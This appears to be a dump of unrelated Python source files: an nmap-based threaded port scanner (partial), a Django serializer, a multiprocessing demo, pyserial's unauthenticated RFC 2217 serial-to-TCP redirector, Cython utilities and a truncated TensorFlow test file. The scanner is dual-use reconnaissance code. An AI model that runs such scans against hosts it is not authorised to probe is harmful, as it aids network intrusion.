state = None
try:
state = self.scanner[target][protocol][port]["state"]
except Exception as exception:
self.count -= 1
return
service = self.scanner[target][protocol][port]["name"]
tqdm.write("\033[1;32m[Hit] %s %s %s %s"%(str(target), str(port), str(service), str(state)))
self.count -= 1
def _full_scan(self, target, port):
try:
self.scanner.scan(hosts=target, ports=str(port), arguments="-sV", sudo=True, timeout=10)
except Exception as exception:
Debug_Print("\033[1;31m[-] Scan Failed: %s!"%str(exception))
self.count -= 1
return
protocol = self.scanner[target].all_protocols()[0]
state = None
try:
state = self.scanner[target][protocol][port]["state"]
except Exception as exception:
self.count -= 1
return
service = self.scanner[target][protocol][port]["name"]
product = self.scanner[target][protocol][port]["product"] if state == "open" else ""
version = self.scanner[target][protocol][port]["version"] if state == "open" else ""
tqdm.write("\033[1;32m[Hit] %s %s %s %s %s %s"%(str(target), str(port), str(service), str(state), str(product), str(version)))
self.count -= 1
def Scan(self, target, port, scantype):
function = None
portlist = []
if scantype == "quick":
function = self._quick_scan
elif scantype == "full":
function = self._full_scan
else:
tqdm.write("\033[1;31m[-] Which scan type do you want to use?")
return
if port == "common":
portlist = APP_CONFIGURATION["EnterprisePorts"]
elif port == "all":
portlist = [x+1 for x in range(65535)]
elif port == "key":
portlist = APP_CONFIGURATION["KeyPorts"]
else:
try:
portlist = [int(x) for x in port.split(",")]
except Exception as exception:
tqdm.write("\033[1;31m[-] Please specify the port(s) correctly: %s"%str(exception))
return
self.flag = len(portlist)
if function is not None and len(portlist) > 0:
portlist = tqdm(portlist)
for port in portlist:
while True:
if self.count < APP_CONFIGURATION["ThreadCount"]:
thread = threading.Thread(target=function, args=(target, port))
thread.start()
self.flag -= 1
self.count += 1
if self.flag <= 10 or int(port) == 6379:
thread.join()
break
else:
pass
portlist.set_description("Processing")
return
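# Illustrative usage sketch (not part of the original class): requires nmap to
# be installed and sudo rights, since the scans above pass sudo=True; the target
# address and port list below are examples only.
#
#   scanner = Nmapper()
#   scanner.Scan("192.168.1.10", "22,80,443", "quick")  # SYN scan of the listed ports
#   scanner.Scan("192.168.1.10", "key", "full")         # -sV scan of the configured KeyPorts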
|
serializers.py
|
import traceback
from threading import Thread
from rest_framework import serializers
from rest_framework.serializers import raise_errors_on_nested_writes
from rest_framework.utils import model_meta
from .models import *
from parsers.main_parsers import *
class AnalysisDetailSerializer(serializers.ModelSerializer):
class Meta:
model = Analysis
fields = ('id', 'patient_name', 'date_uploaded', 'analysis', 'processing_completed', 'processing_result')
def create(self, validated_data):
raise_errors_on_nested_writes('create', self, validated_data)
ModelClass = self.Meta.model
info = model_meta.get_field_info(Analysis)
many_to_many = {}
for field_name, relation_info in info.relations.items():
if relation_info.to_many and (field_name in validated_data):
many_to_many[field_name] = validated_data.pop(field_name)
try:
instance = ModelClass._default_manager.create(**validated_data)
except TypeError:
tb = traceback.format_exc()
msg = (
'Got a `TypeError` when calling `%s.%s.create()`. '
'This may be because you have a writable field on the '
'serializer class that is not a valid argument to '
'`%s.%s.create()`. You may need to make the field '
'read-only, or override the %s.create() method to handle '
'this correctly.\nOriginal exception was:\n %s' %
(
ModelClass.__name__,
ModelClass._default_manager.name,
ModelClass.__name__,
ModelClass._default_manager.name,
self.__class__.__name__,
tb
)
)
raise TypeError(msg)
# Save many-to-many relationships after the instance is created.
if many_to_many:
for field_name, value in many_to_many.items():
field = getattr(instance, field_name)
field.set(value)
Thread(target=parse_analysis, args=(instance, )).start()
return instance
def parse_analysis(analysis):
path = analysis.analysis.path.replace('\\', '\\\\')
analysis.processing_result = str(parse_pdf(path))
analysis.processing_completed = True
analysis.save()
class AnalysisListSerializer(serializers.ModelSerializer):
class Meta:
model = Analysis
fields = ('id', 'patient_name', 'date_uploaded', 'processing_completed')
|
multiprocess1.py
|
import os, time, random
from multiprocessing import Process, Pool
def process():
print('current Process %s start ...' % os.getpid())
pid = os.fork()
if pid < 0:
print('error in fork')
elif pid == 0:
print('I am child process(%s) and my parent process is (%s)' % (os.getpid(), os.getppid()))
else:
print('I (%s) created a child process (%s)' % (os.getpid(), pid))
# Code to be executed in the child process
def run_proc(name):
print('Child process %s (%s) Running....' % (name, os.getpid()))
def def_multiprocess():
print('Parent process %s.' % os.getpid())
for i in range(5):
p = Process(target=run_proc, args=(str(i),))
print('Process will start')
p.start()
p.join()
print('Process end.')
def run_task(name):
print('Task %s (pid=%s) is running...' %(name, os.getpid()))
time.sleep(random.random()*3)
print('Task %s end.' % name)
if __name__ == '__main__':
print('Current process %s.' % os.getpid())
p = Pool(processes=3)
for i in range(5):
p.apply_async(run_task, args=(str(i),))
print('Waiting for all subprocesses done...')
p.close()
p.join()
print('All subprocesses done.')
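# Minimal variation (sketch only, not part of the original script): if run_task
# returned a value, the AsyncResult handles from apply_async could be collected
# and read back with .get():
#
#   with Pool(processes=3) as pool:
#       results = [pool.apply_async(run_task, args=(str(i),)) for i in range(5)]
#       values = [r.get() for r in results]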
|
rfc2217_server.py
|
#!/usr/bin/env python
# (C) 2009 Chris Liechti <cliechti@gmx.net>
# redirect data from a TCP/IP connection to a serial port and vice versa
# using RFC 2217
import sys
import os
import threading
import time
import socket
import serial
import serial.rfc2217
import logging
class Redirector:
def __init__(self, serial_instance, socket, debug=None):
self.serial = serial_instance
self.socket = socket
self._write_lock = threading.Lock()
self.rfc2217 = serial.rfc2217.PortManager(
self.serial,
self,
logger = (debug and logging.getLogger('rfc2217.server'))
)
self.log = logging.getLogger('redirector')
def statusline_poller(self):
self.log.debug('status line poll thread started')
while self.alive:
time.sleep(1)
self.rfc2217.check_modem_lines()
self.log.debug('status line poll thread terminated')
def shortcut(self):
"""connect the serial port to the TCP port by copying everything
from one side to the other"""
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.setDaemon(True)
self.thread_read.setName('serial->socket')
self.thread_read.start()
self.thread_poll = threading.Thread(target=self.statusline_poller)
self.thread_poll.setDaemon(True)
self.thread_poll.setName('status line poll')
self.thread_poll.start()
self.writer()
def reader(self):
"""loop forever and copy serial->socket"""
self.log.debug('reader thread started')
while self.alive:
try:
data = self.serial.read(1) # read one, blocking
n = self.serial.inWaiting() # look if there is more
if n:
data = data + self.serial.read(n) # and get as much as possible
if data:
# escape outgoing data when needed (Telnet IAC (0xff) character)
data = serial.to_bytes(self.rfc2217.escape(data))
self._write_lock.acquire()
try:
self.socket.sendall(data) # send it over TCP
finally:
self._write_lock.release()
except socket.error, msg:
self.log.error('%s' % (msg,))
# probably got disconnected
break
self.alive = False
self.log.debug('reader thread terminated')
def write(self, data):
"""thread safe socket write with no data escaping. used to send telnet stuff"""
self._write_lock.acquire()
try:
self.socket.sendall(data)
finally:
self._write_lock.release()
def writer(self):
"""loop forever and copy socket->serial"""
while self.alive:
try:
data = self.socket.recv(1024)
if not data:
break
self.serial.write(serial.to_bytes(self.rfc2217.filter(data)))
except socket.error, msg:
self.log.error('%s' % (msg,))
# probably got disconnected
break
self.stop()
def stop(self):
"""Stop copying"""
self.log.debug('stopping')
if self.alive:
self.alive = False
self.thread_read.join()
self.thread_poll.join()
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] port",
description = "RFC 2217 Serial to Network (TCP/IP) redirector.",
epilog = """\
NOTE: no security measures are implemented. Anyone can remotely connect
to this service over the network.
Only one connection at a time is supported. When the connection is terminated
it waits for the next connect.
""")
parser.add_option("-p", "--localport",
dest = "local_port",
action = "store",
type = 'int',
help = "local TCP port",
default = 2217
)
parser.add_option("-v", "--verbose",
dest = "verbosity",
action = "count",
help = "print more diagnostic messages (option can be given multiple times)",
default = 0
)
(options, args) = parser.parse_args()
if len(args) != 1:
parser.error('serial port name required as argument')
if options.verbosity > 3:
options.verbosity = 3
level = (
logging.WARNING,
logging.INFO,
logging.DEBUG,
logging.NOTSET,
)[options.verbosity]
logging.basicConfig(level=logging.INFO)
logging.getLogger('root').setLevel(logging.INFO)
logging.getLogger('rfc2217').setLevel(level)
# connect to serial port
ser = serial.Serial()
ser.port = args[0]
ser.timeout = 3 # required so that the reader thread can exit
logging.info("RFC 2217 TCP/IP to Serial redirector - type Ctrl-C / BREAK to quit")
try:
ser.open()
except serial.SerialException, e:
logging.error("Could not open serial port %s: %s" % (ser.portstr, e))
sys.exit(1)
logging.info("Serving serial port: %s" % (ser.portstr,))
settings = ser.getSettingsDict()
# reset control line as no _remote_ "terminal" has been connected yet
ser.setDTR(False)
ser.setRTS(False)
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind( ('', options.local_port) )
srv.listen(1)
logging.info("TCP/IP port: %s" % (options.local_port,))
while True:
try:
connection, addr = srv.accept()
logging.info('Connected by %s:%s' % (addr[0], addr[1]))
connection.setsockopt( socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
ser.setRTS(True)
ser.setDTR(True)
# enter network <-> serial loop
r = Redirector(
ser,
connection,
options.verbosity > 0
)
try:
r.shortcut()
finally:
logging.info('Disconnected')
r.stop()
connection.close()
ser.setDTR(False)
ser.setRTS(False)
# Restore port settings (may have been changed by RFC 2217 capable
# client)
ser.applySettingsDict(settings)
except KeyboardInterrupt:
break
except socket.error, msg:
logging.error('%s' % (msg,))
logging.info('--- exit ---')
|
Utils.py
|
#
# Cython -- Things that don't belong
# anywhere else in particular
#
from __future__ import absolute_import
try:
from __builtin__ import basestring
except ImportError:
basestring = str
import os
import sys
import re
import io
import codecs
from contextlib import contextmanager
modification_time = os.path.getmtime
def cached_function(f):
cache = {}
uncomputed = object()
def wrapper(*args):
res = cache.get(args, uncomputed)
if res is uncomputed:
res = cache[args] = f(*args)
return res
wrapper.uncached = f
return wrapper
def cached_method(f):
cache_name = '__%s_cache' % f.__name__
def wrapper(self, *args):
cache = getattr(self, cache_name, None)
if cache is None:
cache = {}
setattr(self, cache_name, cache)
if args in cache:
return cache[args]
res = cache[args] = f(self, *args)
return res
return wrapper
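# Illustrative usage sketch (hypothetical names): both decorators above memoise
# results keyed by the positional arguments; cached_method stores its cache on
# the instance under '__<name>_cache'.
#
#   @cached_function
#   def slow_lookup(name):
#       return expensive_computation(name)   # evaluated once per distinct name
#
#   class Resolver(object):
#       @cached_method
#       def resolve(self, qualified_name):
#           return do_resolve(qualified_name)  # cached per Resolver instance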
def replace_suffix(path, newsuf):
base, _ = os.path.splitext(path)
return base + newsuf
def open_new_file(path):
if os.path.exists(path):
# Make sure to create a new file here so we can
# safely hard link the output files.
os.unlink(path)
# we use the ISO-8859-1 encoding here because we only write pure
# ASCII strings or (e.g. for file names) byte encoded strings as
# Unicode, so we need a direct mapping from the first 256 Unicode
# characters to a byte sequence, which ISO-8859-1 provides
# note: can't use io.open() in Py2 as we may be writing str objects
return codecs.open(path, "w", encoding="ISO-8859-1")
def castrate_file(path, st):
# Remove junk contents from an output file after a
# failed compilation.
# Also sets access and modification times back to
# those specified by st (a stat struct).
try:
f = open_new_file(path)
except EnvironmentError:
pass
else:
f.write(
"#error Do not use this file, it is the result of a failed Cython compilation.\n")
f.close()
if st:
os.utime(path, (st.st_atime, st.st_mtime-1))
def file_newer_than(path, time):
ftime = modification_time(path)
return ftime > time
@cached_function
def search_include_directories(dirs, qualified_name, suffix, pos,
include=False, sys_path=False):
# Search the list of include directories for the given
# file name. If a source file position is given, first
# searches the directory containing that file. Returns
# None if not found, but does not report an error.
# The 'include' option will disable package dereferencing.
# If 'sys_path' is True, also search sys.path.
if sys_path:
dirs = dirs + tuple(sys.path)
if pos:
file_desc = pos[0]
from Cython.Compiler.Scanning import FileSourceDescriptor
if not isinstance(file_desc, FileSourceDescriptor):
raise RuntimeError("Only file sources for code supported")
if include:
dirs = (os.path.dirname(file_desc.filename),) + dirs
else:
dirs = (find_root_package_dir(file_desc.filename),) + dirs
dotted_filename = qualified_name
if suffix:
dotted_filename += suffix
if not include:
names = qualified_name.split('.')
package_names = tuple(names[:-1])
module_name = names[-1]
module_filename = module_name + suffix
package_filename = "__init__" + suffix
for dir in dirs:
path = os.path.join(dir, dotted_filename)
if path_exists(path):
return path
if not include:
package_dir = check_package_dir(dir, package_names)
if package_dir is not None:
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
# Arcadia-specific lookup: search for packages in include paths,
# ignoring existence of __init__.py files as packages markers
# (they are not required by Arcadia build system)
if not include:
for dir in dirs:
package_dir = os.path.join(dir, *package_names)
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
return None
@cached_function
def find_root_package_dir(file_path):
dir = os.path.dirname(file_path)
if file_path == dir:
return dir
elif is_package_dir(dir):
return find_root_package_dir(dir)
else:
return dir
@cached_function
def check_package_dir(dir, package_names):
for dirname in package_names:
dir = os.path.join(dir, dirname)
if not is_package_dir(dir):
return None
return dir
@cached_function
def is_package_dir(dir_path):
for filename in ("__init__.py",
"__init__.pyc",
"__init__.pyx",
"__init__.pxd"):
path = os.path.join(dir_path, filename)
if path_exists(path):
return 1
@cached_function
def path_exists(path):
# try on the filesystem first
if os.path.exists(path):
return True
# figure out if a PEP 302 loader is around
try:
loader = __loader__
# XXX the code below assumes a 'zipimport.zipimporter' instance
# XXX should be easy to generalize, but too lazy right now to write it
archive_path = getattr(loader, 'archive', None)
if archive_path:
normpath = os.path.normpath(path)
if normpath.startswith(archive_path):
arcname = normpath[len(archive_path)+1:]
try:
loader.get_data(arcname)
return True
except IOError:
return False
except NameError:
pass
return False
# file name encodings
def decode_filename(filename):
if isinstance(filename, bytes):
try:
filename_encoding = sys.getfilesystemencoding()
if filename_encoding is None:
filename_encoding = sys.getdefaultencoding()
filename = filename.decode(filename_encoding)
except UnicodeDecodeError:
pass
return filename
# support for source file encoding detection
_match_file_encoding = re.compile(u"coding[:=]\s*([-\w.]+)").search
def detect_file_encoding(source_filename):
f = open_source_file(source_filename, encoding="UTF-8", error_handling='ignore')
try:
return detect_opened_file_encoding(f)
finally:
f.close()
def detect_opened_file_encoding(f):
# PEPs 263 and 3120
# Most of the time the first two lines fall in the first 250 chars,
# and this bulk read/split is much faster.
lines = f.read(250).split(u"\n")
if len(lines) > 1:
m = _match_file_encoding(lines[0])
if m:
return m.group(1)
elif len(lines) > 2:
m = _match_file_encoding(lines[1])
if m:
return m.group(1)
else:
return "UTF-8"
# Fallback to one-char-at-a-time detection.
f.seek(0)
chars = []
for i in range(2):
c = f.read(1)
while c and c != u'\n':
chars.append(c)
c = f.read(1)
encoding = _match_file_encoding(u''.join(chars))
if encoding:
return encoding.group(1)
return "UTF-8"
def skip_bom(f):
"""
Read past a BOM at the beginning of a source file.
This could be added to the scanner, but it's *substantially* easier
to keep it at this level.
"""
if f.read(1) != u'\uFEFF':
f.seek(0)
def open_source_file(source_filename, mode="r",
encoding=None, error_handling=None):
if encoding is None:
# Most of the time the coding is unspecified, so be optimistic that
# it's UTF-8.
f = open_source_file(source_filename, encoding="UTF-8", mode=mode, error_handling='ignore')
encoding = detect_opened_file_encoding(f)
if encoding == "UTF-8" and error_handling == 'ignore':
f.seek(0)
skip_bom(f)
return f
else:
f.close()
if not os.path.exists(source_filename):
try:
loader = __loader__
if source_filename.startswith(loader.archive):
return open_source_from_loader(
loader, source_filename,
encoding, error_handling)
except (NameError, AttributeError):
pass
stream = io.open(source_filename, mode=mode,
encoding=encoding, errors=error_handling)
skip_bom(stream)
return stream
def open_source_from_loader(loader,
source_filename,
encoding=None, error_handling=None):
nrmpath = os.path.normpath(source_filename)
arcname = nrmpath[len(loader.archive)+1:]
data = loader.get_data(arcname)
return io.TextIOWrapper(io.BytesIO(data),
encoding=encoding,
errors=error_handling)
def str_to_number(value):
# note: this expects a string as input that was accepted by the
# parser already, with an optional "-" sign in front
is_neg = False
if value[:1] == '-':
is_neg = True
value = value[1:]
if len(value) < 2:
value = int(value, 0)
elif value[0] == '0':
literal_type = value[1] # 0'o' - 0'b' - 0'x'
if literal_type in 'xX':
# hex notation ('0x1AF')
value = int(value[2:], 16)
elif literal_type in 'oO':
# Py3 octal notation ('0o136')
value = int(value[2:], 8)
elif literal_type in 'bB':
# Py3 binary notation ('0b101')
value = int(value[2:], 2)
else:
# Py2 octal notation ('0136')
value = int(value, 8)
else:
value = int(value, 0)
return -value if is_neg else value
def long_literal(value):
if isinstance(value, basestring):
value = str_to_number(value)
return not -2**31 <= value < 2**31
@cached_function
def get_cython_cache_dir():
"""get the cython cache dir
Priority:
1. CYTHON_CACHE_DIR
2. (OS X): ~/Library/Caches/Cython
(posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined
3. ~/.cython
"""
if 'CYTHON_CACHE_DIR' in os.environ:
return os.environ['CYTHON_CACHE_DIR']
parent = None
if os.name == 'posix':
if sys.platform == 'darwin':
parent = os.path.expanduser('~/Library/Caches')
else:
# this could fallback on ~/.cache
parent = os.environ.get('XDG_CACHE_HOME')
if parent and os.path.isdir(parent):
return os.path.join(parent, 'cython')
# last fallback: ~/.cython
return os.path.expanduser(os.path.join('~', '.cython'))
@contextmanager
def captured_fd(stream=2, encoding=None):
pipe_in = t = None
orig_stream = os.dup(stream) # keep copy of original stream
try:
pipe_in, pipe_out = os.pipe()
os.dup2(pipe_out, stream) # replace stream by copy of pipe
try:
os.close(pipe_out) # close original pipe-out stream
data = []
def copy():
try:
while True:
d = os.read(pipe_in, 1000)
if d:
data.append(d)
else:
break
finally:
os.close(pipe_in)
def get_output():
output = b''.join(data)
if encoding:
output = output.decode(encoding)
return output
from threading import Thread
t = Thread(target=copy)
t.daemon = True # just in case
t.start()
yield get_output
finally:
os.dup2(orig_stream, stream) # restore original stream
if t is not None:
t.join()
finally:
os.close(orig_stream)
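# Illustrative usage sketch (not part of the original module): capture C-level
# stderr (fd 2) around a call that writes to it, then read it back as text once
# the context has exited and the copier thread has joined.
#
#   with captured_fd(2, encoding="utf8") as get_stderr:
#       os.system("echo oops 1>&2")
#   print("captured:", get_stderr())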
def print_bytes(s, end=b'\n', file=sys.stdout, flush=True):
file.flush()
try:
out = file.buffer # Py3
except AttributeError:
out = file # Py2
out.write(s)
if end:
out.write(end)
if flush:
out.flush()
class LazyStr:
def __init__(self, callback):
self.callback = callback
def __str__(self):
return self.callback()
def __repr__(self):
return self.callback()
def __add__(self, right):
return self.callback() + right
def __radd__(self, left):
return left + self.callback()
# Class decorator that adds a metaclass and recreates the class with it.
# Copied from 'six'.
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
|
experiment_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import tempfile
import threading
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn import monitors
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.contrib.learn.python.learn.utils import saved_model_export_utils
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import saver
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import compat
from tensorflow.python.util.all_util import reveal_undocumented
class SheepCounter(object):
"""To be patched in for time.sleep, in order to capture how long was slept."""
def __init__(self):
self._total_time = 0
self._sleeptimes = []
def __call__(self, t):
self._total_time += t
self._sleeptimes += [t]
@property
def total_time(self):
return self._total_time
@property
def sleep_times(self):
return self._sleeptimes
class TestEstimator(evaluable.Evaluable, trainable.Trainable):
def __init__(self, config=None, max_evals=5):
self.eval_count = 0
self.fit_count = 0
self._max_evals = max_evals
self.export_count = 0
self.monitors = []
self.eval_hooks = []
self._config = config or run_config.RunConfig()
self._model_dir = tempfile.mkdtemp()
@property
def model_dir(self):
return self._model_dir
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf_logging.info('evaluate called with args: %s' % kwargs)
if 'hooks' in kwargs:
self.eval_hooks = kwargs['hooks']
self.eval_count += 1
if self.eval_count > self._max_evals:
tf_logging.info('Ran %d evals. Done.' % self.eval_count)
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fake_checkpoint(self):
save_path = os.path.join(self.model_dir, 'model.ckpt')
with session.Session() as sess:
var = variables.Variable(1.0, name='var0')
save = saver.Saver({var.op.name: var})
var.initializer.run()
save.save(sess, save_path, global_step=0)
def fit(self, **kwargs):
self.fake_checkpoint()
tf_logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def export_savedmodel(self, export_dir_base, serving_input_fn, **kwargs):
tf_logging.info('export_savedmodel called with args: %s, %s, %s' %
(export_dir_base, serving_input_fn, kwargs))
self.export_count += 1
return os.path.join(
compat.as_bytes(export_dir_base), compat.as_bytes('bogus_timestamp'))
class _NoopHook(session_run_hook.SessionRunHook):
pass
class ExperimentTest(test.TestCase):
def _cluster_spec(self):
return {
run_config_lib.TaskType.PS: ['host1:2222', 'host2:2222'],
run_config_lib.TaskType.WORKER:
['host3:2222', 'host4:2222', 'host5:2222']
}
def test_train(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEqual(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEqual(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_train_default_delay(self):
for task_id in [0, 1, 3]:
tf_config = {'task': {'index': task_id}}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train()
self.assertAlmostEqual(task_id * 5, sheep.total_time, delta=0.1)
@test.mock.patch.object(server_lib, 'Server')
def test_train_starts_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host4:2222', num_cores=15, gpu_memory_fraction=0.314)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=1)
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(1, sheep.total_time, delta=0.1)
# Assert.
expected_config_proto = config_pb2.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name=run_config_lib.TaskType.WORKER,
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([test.mock.call().start()])
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_with_empty_master(self, mock_server):
tf_config = {'cluster': self._cluster_spec()}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(master='')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'index': 1
}
}
with test.mock.patch.dict(
'os.environ',
{'TF_CONFIG': json.dumps(tf_config)}), self.assertRaises(ValueError):
config = run_config_lib.RunConfig(
master='host3:2222' # Normally selected by task type.
)
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEqual(0, est.fit_count)
self.assertEqual(1, est.eval_count)
self.assertEqual([noop_hook], est.eval_hooks)
def test_evaluate_delay(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input',
eval_hooks=[noop_hook])
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.evaluate(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
self.assertEqual([noop_hook], est.eval_hooks)
def test_continuous_eval(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(
StopIteration, ex.continuous_eval, evaluate_checkpoint_only_once=False)
self.assertEqual(0, est.fit_count)
self.assertEqual(6, est.eval_count)
self.assertEqual([noop_hook], est.eval_hooks)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
self.assertRaises(
StopIteration,
ex.continuous_eval,
evaluate_checkpoint_only_once=False)
self.assertAlmostEqual(5 * delay, sheep.total_time, delta=0.15)
def test_continuous_eval_predicate_fn(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
def _predicate_fn(unused_eval_result):
return est.eval_count < 3
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
ex.continuous_eval(evaluate_checkpoint_only_once=False,
continuous_eval_predicate_fn=_predicate_fn)
self.assertEqual(0, est.fit_count)
self.assertEqual(3, est.eval_count)
self.assertEqual([noop_hook], est.eval_hooks)
def test_run_local(self):
est = TestEstimator()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEqual(1, est.fit_count)
self.assertEqual(1, est.eval_count)
self.assertEqual(1, len(est.monitors))
self.assertEqual([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
def test_train_hooks_extend_does_not_mutate_input_hooks(self):
noop_hook = _NoopHook()
input_hooks = [noop_hook]
ex = experiment.Experiment(
TestEstimator(),
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_monitors=input_hooks)
self.assertAllEqual([noop_hook], ex._train_monitors)
another_noop_hook = _NoopHook()
# Assert that the extend API mutates the hooks, but not the input hooks
ex.extend_train_hooks([another_noop_hook])
self.assertAllEqual([noop_hook, another_noop_hook], ex._train_monitors)
self.assertAllEqual([noop_hook], input_hooks)
def test_export_strategies_reset(self):
est = TestEstimator()
export_strategy_1 = saved_model_export_utils.make_export_strategy(
est, 'export_input_1', exports_to_keep=None)
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100,
export_strategies=[export_strategy_1])
ex.train_and_evaluate()
self.assertEqual(1, est.export_count)
# After reset with empty list (None), the count does not change and the user
# provided export strategy list should remain intact.
old_es = ex.reset_export_strategies()
ex.train_and_evaluate()
